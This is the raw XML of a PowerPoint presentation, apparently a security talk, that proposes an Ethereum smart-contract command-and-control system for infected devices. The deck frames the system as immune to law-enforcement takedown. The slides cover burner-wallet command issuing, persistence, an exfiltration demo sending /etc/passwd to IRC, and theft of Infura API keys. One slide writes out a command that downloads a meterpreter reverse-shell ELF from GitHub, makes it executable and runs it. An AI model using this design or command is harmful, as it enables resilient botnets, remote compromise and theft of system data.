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72" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="26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FF457-EC90-4BAF-B71A-A04A45CF9E2C}" v="23" dt="2023-11-27T00:35:24.594"/>
    <p1510:client id="{BDC0FA6A-ADE1-81B1-9902-C958A7ECD5C4}" v="9" dt="2023-11-27T00:47:20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6" autoAdjust="0"/>
    <p:restoredTop sz="83454"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="120" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="1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Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{BDC0FA6A-ADE1-81B1-9902-C958A7ECD5C4}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{BDC0FA6A-ADE1-81B1-9902-C958A7ECD5C4}" dt="2023-11-27T00:47:19.630" v="7" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{BDC0FA6A-ADE1-81B1-9902-C958A7ECD5C4}" dt="2023-11-27T00:47:19.630" v="7" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1024041356" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{BDC0FA6A-ADE1-81B1-9902-C958A7ECD5C4}" dt="2023-11-27T00:47:19.630" v="7" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1024041356" sldId="256"/>
            <ac:spMk id="2" creationId="{45AE94BA-862B-432D-9DF0-4B716166877B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{3E3FF457-EC90-4BAF-B71A-A04A45CF9E2C}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{3E3FF457-EC90-4BAF-B71A-A04A45CF9E2C}" dt="2023-11-27T00:35:23.375" v="21" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{3E3FF457-EC90-4BAF-B71A-A04A45CF9E2C}" dt="2023-11-27T00:35:23.375" v="21" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1291278040" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{3E3FF457-EC90-4BAF-B71A-A04A45CF9E2C}" dt="2023-11-27T00:35:23.375" v="21" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291278040" sldId="263"/>
            <ac:spMk id="5" creationId="{2C3FAEAD-0F32-6088-0462-39A427A396F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Cooper Wiegand" userId="S::cooper.wiegand@ironwoodcyber.com::6499dac0-e7ee-409f-b3fe-2368eaa9e32c" providerId="AD" clId="Web-{3E3FF457-EC90-4BAF-B71A-A04A45CF9E2C}" dt="2023-11-27T00:34:27.046" v="0"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291278040" sldId="263"/>
            <ac:picMk id="3" creationId="{830AE850-AC46-A131-41C1-8CECFCB2EC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F0DA-FB17-4EF6-A0D6-4157F6FF28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93E8-5CE5-4A46-A20F-E45009F3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E93E8-5CE5-4A46-A20F-E45009F3C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Commands are sent utilizing anonymous blockchain wallets (burner wallets can be rapidly created)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web3 providers/routes can be created and destroyed anonymously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>API hijacking can help obscure origin and shift blame to others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Resiliency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no "kill-switch", data is protected by a network churning “billions” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CoinMarketCap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) of USD in assets each day and is duplicated across “hundreds of thousands of nodes” (IEEE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence can be achieved via hot-swapping authorized attackers, routes in the Web3 Provider Layer, and even multiple C2 hosts within the blockchain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autonomy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command sequences will be stored forever and will continue to take effect even if the attacker is removed from the picture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/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Serverless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Anonymous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Choke point agnostic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Removal = Economic Catastrophe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E93E8-5CE5-4A46-A20F-E45009F3C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voice track to talk about what a Solidity Smart Contract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E93E8-5CE5-4A46-A20F-E45009F3C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E93E8-5CE5-4A46-A20F-E45009F3C4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94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3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DB160F-1031-45B5-B6FD-F1D96E97D2F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2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Qw4w9WgXc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94BA-862B-432D-9DF0-4B7161668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Choke Point Agnostic Command and Control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1752-BA44-4073-B3FB-29495268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69565"/>
            <a:ext cx="9440034" cy="817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shiloh (Cooper Wiegand)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>⚕Dr. ALE🍺 (Dr. Aaron Estes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102404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5B7B-0CC6-447C-8CDA-37D8CB07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33CA-CF10-46F8-8689-730A31BA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https://coinmarketcap.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ieeexplore.ieee.org/document/9236965 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.techtarget.com/searchsecurity/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://web3-technology-stack.readthedocs.io/en/latest/layer_3/apis/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5DF8-CAB1-4CD5-BBB9-6CC00BDC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could achieve a C2 solution that couldn't be shutdown or cutoff by law enforcement?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A13C32-B4A9-4119-BA0B-B22AD28C3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37" y="1903671"/>
            <a:ext cx="5064125" cy="27977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CCA6E-FBC9-4E69-8578-2AA0F9573030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525253" y="5279004"/>
            <a:ext cx="913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“Command-and-control servers, also called C&amp;C or C2, are used by attackers to maintain communications with compromised systems within a target network.” (TechTarget)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68416-C2D7-4721-A0B4-AAC6BA3873D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563937" y="4701467"/>
            <a:ext cx="5064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Possible network topology of a traditional C2 server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221813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405B-9EC9-45C9-AECD-2635DC12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1608-54DE-45B9-9AFA-988BFD69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1276"/>
            <a:ext cx="10353762" cy="1767269"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A blockchain is a list of records, called blocks, that are linked together using cryptography.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once a new block is linked to the chain, it and all previous blocks are forever unalterable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Some blockchains, such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethereum blockchain, can host and process code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CD76C5-79BC-44A1-8394-989DCDC41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17" y="3652117"/>
            <a:ext cx="2465157" cy="259628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232E36A-3146-4ED8-8045-F2788C89D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92" y="3652117"/>
            <a:ext cx="2429093" cy="2606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39F52-AA2C-41EF-A672-D01AE9236496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394193" y="6310058"/>
            <a:ext cx="242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Blockchain operating as a “Ledger”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5A87-DF7C-4505-8A8F-BCA993E36BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368714" y="6310058"/>
            <a:ext cx="246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Network of synchronized Ethereum Nodes creating a “Distributed Ledger”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175315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C2D3-FD4C-4183-A2F0-EF54E628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Blockchain Based C2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B675-ED51-4CA9-87FA-907F617D1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09" y="1711509"/>
            <a:ext cx="5249680" cy="4745133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Commands are issued from burner accounts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Resiliency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands are duplicated across thousands of nodes and shielded by billions in economic assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autonomy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commands are stored forever and continue to execute if attackers are removed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6431A3-456E-4B03-B5AE-F9C6A1A5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96" y="2070827"/>
            <a:ext cx="5671023" cy="3736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EDEA4-894D-4422-8A93-55F97A93220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236444" y="5807487"/>
            <a:ext cx="5064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Possible network topology of a blockchain based C2 solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426284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78FB-1D97-4F76-8B26-2E922216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 Solidity Smart Contract (DAPP)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E173-EF69-4155-B6C6-8DEF78EE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98704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2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Utilizes a One -&gt; Many messaging model where commanders/shepherds send a message to whichever tags/channels they wish to communicate with</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Paid Functions (require “gas” to process &amp; store data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(message, [tags])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Free Functions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get_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>posthash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)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get_postcount_from_address_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(shepherd, tag)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get_posthash_from_address_tag_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(shepherd, tag, id)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13073-6A89-4CB7-B21A-9C3A875C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099547"/>
            <a:ext cx="5870252" cy="3324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9CA6C-407C-4BAC-9621-36B364C18EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493739" y="5424100"/>
            <a:ext cx="5064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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>push_post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> method used to send commands to endpoints on infected devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385626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94DE-72E5-4015-8B53-C73FB30A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82DC-4484-47C8-8A92-C7DF528F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26" y="1747309"/>
            <a:ext cx="5493584" cy="450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Customizable for any language that supports Web3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Javascript, Python, .NET, C++, etc.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We utilized an OpCode system to reduce the amount of data needing to be stored on the blockchain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence: Update Tags, Shepherds, Relays, W3 Providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End-to-end encryption (E2EE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auto-Disposal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5DE25-1312-4511-B149-A5E2237989DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574307" y="2393749"/>
            <a:ext cx="49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Required Initialization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5CC05-0A78-4C74-9B78-71BAC5811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86"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574310" y="1747308"/>
            <a:ext cx="4933671" cy="679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D61EE-1676-4414-A703-00A1924C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11" b="38887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574310" y="2769746"/>
            <a:ext cx="4933671" cy="13088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B5C66-1BB9-471B-AD2B-3FE0CFDEEB2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574307" y="4062201"/>
            <a:ext cx="4933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Example OpCodes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03B730-114D-44F8-ABF3-5FBD25442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47" y="4421204"/>
            <a:ext cx="4963930" cy="1514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9C624A-34A2-4D71-992C-B3F7801E56CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544046" y="5933907"/>
            <a:ext cx="4963929" cy="26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Example Command_Received to add an additional C2 Relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37690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344B-C7AE-40C0-A985-91DA7C5E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[Demo] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auto Exfil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D58D-77A8-415F-9B0D-CDF67147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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a demo that shows how a newly infected device automatically fetches commands from the blockchain and uploads /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd files to an IRC channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Highlight that a virus can continue to spread and publish sensitive info for hosts indefinitely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289131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165B-8A83-4B91-92C9-FE6DDD3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[Future Slide] Additional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734A-209F-463C-948C-5D91C043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Theft via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Infura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keys (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>API hijacking)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automation of wallet and web3 provider/routes creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eternal auto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (commands can’t be taken down)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“long haul” C2: essentially a secondary C2 that maintains persistence over very-long periods of time, makes it difficult for defenders to totally uproot the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gas station funding so bots can talk on blockchain for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4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B26B25-B954-4BC9-884F-BDFB6F034C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919119" y="1746703"/>
            <a:ext cx="10353762" cy="23779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Command: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~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget https://github.com/Cooperw/meterpreter_executables/raw/main/linux_x64_meterpreter_reverse_tcp_local_4444.elf;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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +x linux_x64_meterpreter_reverse_tcp_local_4444.elf;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35E21E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./linux_x64_meterpreter_reverse_tcp_local_4444.elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36900" indent="0">
              <a:buFont typeface="Wingdings 2" charset="2"/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OpCode 0 =&gt; “Run Raw Command”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download some meterpreter code to the target device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Designate the script executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35E21E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute the downloaded script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B755A-3810-429E-96AA-E3EF599B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5" y="4441041"/>
            <a:ext cx="3467431" cy="1250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EB9122-A8A8-42F5-AC5D-F0970FE41D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038785" y="5692685"/>
            <a:ext cx="3467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Preparing a command for our C2 Smart Contract using the Remix IDE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="200,000 units are ready, with a million more well on the way &quot; Template HD  Remastered - [7680*3216] : r/PrequelMemes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAA52E9E-5FF7-A590-46BE-C5C8A82AF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239702" y="3537856"/>
            <a:ext cx="5027855" cy="226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3FAEAD-0F32-6088-0462-39A427A3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z="4000" dirty="0"/>
              <a:t>[Demo]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Remote Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129127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aa43af5a-4115-4f20-974a-699a03a8daf1" xsi:nil="true"/>
    <_ip_UnifiedCompliancePolicyProperties xmlns="http://schemas.microsoft.com/sharepoint/v3" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="88cd6b57-1be7-449e-a42e-736260d4731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FDC55EF72EE4A81006FE3CCD4CEB8" ma:contentTypeVersion="19" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="6dd28f527a98be1eeccfd938dfa89018">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="88cd6b57-1be7-449e-a42e-736260d47312" xmlns:ns3="aa43af5a-4115-4f20-974a-699a03a8daf1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e9a606e94249c0e49f3ee190838e2429" ns1:_="" ns2:_="" ns3:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="88cd6b57-1be7-449e-a42e-736260d47312"/>
    <xsd:import namespace="aa43af5a-4115-4f20-974a-699a03a8da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d6b57-1be7-449e-a42e-736260d47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2e8c4a0-7a76-4b7b-af57-3b1ceff271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3af5a-4115-4f20-974a-699a03a8d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fc80b1b-21b5-483a-9d11-17319d71c024}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="aa43af5a-4115-4f20-974a-699a03a8da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DB3989-D286-43DF-BFF8-7D15F6BCFD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A349B5-FFBC-419D-B558-90B59A3CB00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aa43af5a-4115-4f20-974a-699a03a8daf1"/>
    <ds:schemaRef ds:uri="88cd6b57-1be7-449e-a42e-736260d47312"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A12FB9CE-AAB3-464A-80B9-54CACA1EE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8cd6b57-1be7-449e-a42e-736260d47312"/>
    <ds:schemaRef ds:uri="aa43af5a-4115-4f20-974a-699a03a8d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3397</TotalTime>
  <Words>811</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>90</Paragraphs>
  <Slides>10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</vt:lpstr>
      <vt:lpstr>A Choke Point Agnostic Command and Control Solution</vt:lpstr>
      <vt:lpstr>What if we could achieve a C2 solution that couldn't be shutdown or cutoff by law enforcement?</vt:lpstr>
      <vt:lpstr>What is a Blockchain?</vt:lpstr>
      <vt:lpstr>Benefits of a Blockchain Based C2 Solution</vt:lpstr>
      <vt:lpstr>C2 Solidity Smart Contract (DAPP)</vt:lpstr>
      <vt:lpstr>Endpoint Software</vt:lpstr>
      <vt:lpstr>[Demo] Auto Exfil</vt:lpstr>
      <vt:lpstr>[Future Slide] Additional Vectors</vt:lpstr>
      <vt:lpstr>[Demo] Remote Execution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Wiegand, Cooper - (wiegand)</dc:creator>
  <cp:lastModifiedBy>Cooper Wiegand</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-04T04:33:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-27T00:47:20Z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0x010100F57FDC55EF72EE4A81006FE3CCD4CEB8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>